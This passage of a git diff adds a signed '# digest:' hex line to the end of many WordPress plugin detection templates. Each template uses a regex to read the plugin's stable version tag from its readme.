4b0a00483046022100c63fda43b705b044e6b14bf1738018db4ec16b388438f7776bc2e0047cbe489c022100a5a7310f66aa1acde8874347906e3b445a9dca804e4b769b96484ec51a1823f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..0fa0addbdb 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d38fc87f0731a79774ac83022759deddd707255c9baea7f5b72eec441384ab5702205722018af7a9ccf9ad056466e0194f3510681a1e0be97ae82015e851972e1fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..12d10d8b38 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220661b89833b5ae6b3bcc185a66e4a548e3f4e0327f3dc5128b2160eb1fec8f30102206c09aab9dcfea188edaf92ece0390a3e7a9f49aa54f2d05d58abdfe09ab73ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..b9d7590df2 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203668622a4e87c4b4865f24b460661d7f86e627be23b5b83c9aaaf434532235c7022004f50f5f3e537d4b3d65b4ab6989e8f1977eb152529562c877aef029bff5fc81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..0f383c1176 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058f293a946fecc6da72e9865fef09b8371a762d8c9e6108d2c3e28f76686bda50221008e7fef8351e428d49b6a2b738aa8a31c258530d98dd7f998edc8e291a409ab92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..bb51548362 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220607fff18b414cf42694e29df52c62a9438721703b1c24e64c733eb635ac88f80022100c565fa8bd4bb8e29339ce26a806204a3f2bc93294f186ea7cf4b7417d55387fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..1023993ceb 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220368cfad172de8e1418b9d67edeae7be929309ca7dcf78ebd6c9c4e1d12153b6802205c8738e9f5afae118dc957cd107f31790c3e0a0205a1a61a0e80792ef4bb1e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..bab686eb73 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025412e4ea8b06dbb1e6467bc51f8f5efd1660a3d5bee0d80412061b3e4c50b04022100fc0d27b088a0b9de5135203b0ea6dd55cd9e39c681e1209d5469afdf0e3bfde0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..35170af76a 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bfe4b78e10b674b1083f0a12b8d1a4e4e65f320da45251029b96abd3537a4e0b02204483ae486d6d2fd4a8e0b0bcd229fde840764a0996d03dbf47dbf5218950dafe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..ca15049893 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206e08c841bb5399a2ea23d95f4ee289feaaa0c27705d9314c1202a931ed7c8c91022100e95c87c44b1fbe60d808ba3990eff56eab4cfdcddcc1905c446113ac0ca30c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..427a4f4d2a 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b2b1d87051c6fe7567403a76bf18f720135f66992506ae3ed2be80e655036ab0221009c8768644a8d5fe951783b52e89eb5671cb935734f0ddfc46762700b7c5130fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..0da0134b71 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d7c9e7c74a5e4d95960bb0780027aac378d0d9554ff6e3be313472b323f6d5c5022100edb34fd121baf93ccd889fe35aa9f78d754b4efd7b22e53189df495dbf710108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..025e00ac5a 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e41d7f6b6650450e5d0b12eaf7e54212d6adca18c7bf885266cc161e691082402207e8e73b4df4e21dd23cc47726d1859e7322e83276083aeb46095472276c1ce37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..3921b45b34 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a86e2aa726400f7503dace36e05463574c5c42675879bf370c36734160e08927022064afd7ff65664937033ec9e7daf47228a2d1ece8e67b74775df7765462893e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..020cc39aa3 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e09b269c963b2d466e2b4461bd2b1e34ce44515e1726bbf1dfd972f14189ac2402201b572fe490b50632cd85404e9e004218ebe37d16021ae3290eeab233302feb2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..1580eec5b1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aab350f3dcc088fc8642c6ec38f617201b45e6a08b0219cf89754a58b3a9d2360220574a35a4907c849648db8f7ec9e5ce2a9903fc825a0f6de348760122e1e921a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..1d373951b7 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dcb22bb64e4a2b62a6d427b459abed5e585cd156f758b14ff2e7111793b4fe6d02201d199f49c15a1af1fa0d92b3bd4973e5b74b4e4c81b6ac16ed4190afec0ef7f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..4e34592599 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c588b94ad7b1ba13002b321cd539213a4890b24e239288968a543b2a371f7343022028b9b7847c7a7bb5bd657df3f815e7216ff27aa09cb4293bcfb8afdea91d4ca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..990f77bb62 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100814c1784742c116a56f46f93f7cce06de7a9670b94d1c2c4b5a698fd720095310221009498a7d2e04db2adb5f98f8483e4c0813d36daa1d086cfa52a7584af5cdcc0e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..76f04102f8 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206389702b585158c9330a287c18cff7343e5408702cfe04191ec3885265593714022100d2cfdbfd26cf261253d7024d5108f75c13962895bc5d0a2fe7832444ae47ee96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..b495c2fd71 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000a930b03da6378acb15358fa1aadc71783dbe29fc81507aa8db14ea49ed56a50221008008f3099d569469f2abfec8674a9ba44663213ae450d6168dc4ecdfcfa3741c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..d1c6abf13b 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eb56a3d16277582fd7680a872a9479242ba4bbd758ac40fa2790a4734516074f02210094487b6015cfbd6e4880b73484bee39ebbfb7e4ff5044e62207402dacd98ebc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..953efec677 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aac2fb65b5c35854d9661f779dbb8aba47f754bd7a94174e0df7702024cce30d022100e5a13a7604956d9e31b92f9a089acda9c5e101745e98d7796c7a17336834c50c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..38e50969bb 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b58ee8ea24bfebaa8c947fa2d8053f7a4249f8d9971f44c58bc0a94e3402c530022100b3ef8073e109771d6b5379fb4b04e7d68a5b17e7cf18115fff6702f07deb11e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..ef8fdc7f8e 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c02db1e1dc9c5c31fb702724b74efa0c161dca561308c0bc05b25f73b5d35c50022100999fab0545c5cbc473525b5347b14b7273b337465d47c752e2743617d82fd805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..e9d5307661 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085973eccb0528762e742261706b0636f3c90f97b6caf73fff8ab81dfc8b237dd022100b11747e1e6fdf09855145438ee3719bbb957919e4185ef96b6dc5a0b2f59f9ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..48179726ca 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd3e5d6495c9353564f8bd039717cfec1c8bcd1cc355aaa1185502f09e09bf8c02210081fc3b5f5be84702592914dac5bc98ff8c063610a0068b79f6261c005bc166bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..ed865d06bd 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d41282ec81ef9258c5c903b819c479f89c91c5b8458835c8e1a10547f6689418022100c4f4aad9e19c2b7319ac504e24cb64597fe515d782175a6d5a237c1ede2c9b74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..f3ba73cdfc 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205a1e31d192f32a57be2f88c07dead074782e7e897b3809b3d4d0c230971be58202206fd7a5783ed16d293cd5c0eb56397165534bf87a77bdd68301e14f467a58f681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..aca9ab4ee3 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100834e309fee6b38ad469ba1bb6a5cf72f9f0df407fe2dcf6f9945f52f20a9bdcf022100dd157196036f4d6a41948cfd77decc887318e50b81c8d1ea0e090b6638f8c7a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..767938eb9c 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024bcc4bcb7ae7ed9474052942dcb8fbb4e23c2ff023fcb3e9bd70c77126e5c5502201e8516e3f7b5dfb97ed0f074a4059e7b1d34916ca5aec02af232955b03d9075d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..925e533ec7 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064f5b57a253fc8694c776dd57ea50d232f9ecf332489b97d086b855b7a844b1e022030e63d881654934517cdea9b57e82770711ab777987b65472cba414fc2a86d27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..dc70eadd43 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b8215f9a920ef042d984dfbef99970e2fe3f592f05904510b00b46391c7b1e20221008af77589464339c020d0956104c71388ae09d8fde6c4ddbe551ec6443d9d73d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..c25aebea7d 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008af1cea4f7f716f33a7f99c3442ad65eeab25946e2b9e66638f2faab1ba427cc0221008d9efec8129e7471a282b135f7d8c32efcc80690fdb7787849398e2fdd563e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..987178ebe9 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009aed91a1a7bafe89496aec46a0b0b0a3c74e84d6326ed00a2182594ce806750302204f2c720a0d5871a182d28de866fd549cfdd253574fe4e87045e52778bc704156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..0869974979 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220323af72842f53b591b5fe909644d6033bf57cb6568276252a3ac4392c04910270220534a33ea4b8b579862cc0025c31a511d6536c9f4006404336041b07510c3ab0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..db51d90833 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200fb657a278f5cec6f184504864956629dbb95315c3d408a6e7a930d129debeaa022100b942da3e0147f8ac616b58ed0cb024e411b0f4c688f64074711e2242bbfb1f2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..45494721f7 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cb9570b0c0fcf1cdc9d2df8d18704006f8236f05f4eb1fc6caa30208c225070902201514380ca01da0dd074678dddf841f2eeedd8c381736f378bc9deae7238ccc03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..79a5a83393 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022072f8673849fce41dc24e7b779a09b59f033eb8354eb4040750ff7e1039378be3022100e663678da320fefdf903317aabcb9f00fd4bd33e2f655a43f72dde521c3efdc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..bad78e7a0c 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053e2cad3a17e0cd229aee0ffb49283ad7fba15510651fc1f74377e2f0ee3e9dd022100b98644ebe15097d12c123fbc9092911427efaba878f38b771b80ee5d6576e522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..1cbc910275 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef747795c419b4dc2eab45ad22ff8afd8c00f8961ada087559704b443f0f40320221008f51d6d8d888e76dd0d01ac826f4147eed532615f1a2ecbecca9cebcf306a801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..a006073354 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220575f3da25e08e7359033e37696568d5ae5cfeb53e048890f16ac9b551ea964d5022100f021c44001b9c753bd6bc5c615fd951c4be9bae4ba8626303203f5610cb0547f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..a8fcb984f7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d097ed0d67e34d98eb0d9d5ae81c31ffa709551834e3d09ddd48fbdee61a2bd0220128bd91e2c0ecce4cc5204cf433fb1ee5f1643fb4bbf07ef62566201fdb8a8c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..0bcc326e25 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d71ae447da0acaa3d47d9c793f110de18ddfd78d0beca6e6dd9256cec60c2cab022100adc8f618cb95625032f34b257bc96546d16e2474fa277ec1fa625c0332f8bba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..f789f0c67b 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb8c4a3528ca69521db99f4482068d769fa7460f2a665311a238ff64057a70410221008ec0bcf392cc11b84ead7863869594d57531903d7ea133b5d83bf4400a3d68c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..bc4a300756 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210089c8db51a0d64802c7cd64668c4a63a6b077d1f0e3b01a15b6cd914477c8c1e3022100d5e76ba20bcda6ec5181ee77d484e7419728d9c7d722fc7f18515cf89b804fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..57e7080720 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200412383001a535dbe1db8b9a2e1a4f8ffdc4be55bc3aa2f6f17411cf69b847c6022100f9c2df846212fa96c3327eec234c6c758c105af874cd3f183b400e980784b6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..8e5c4fd9c7 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ 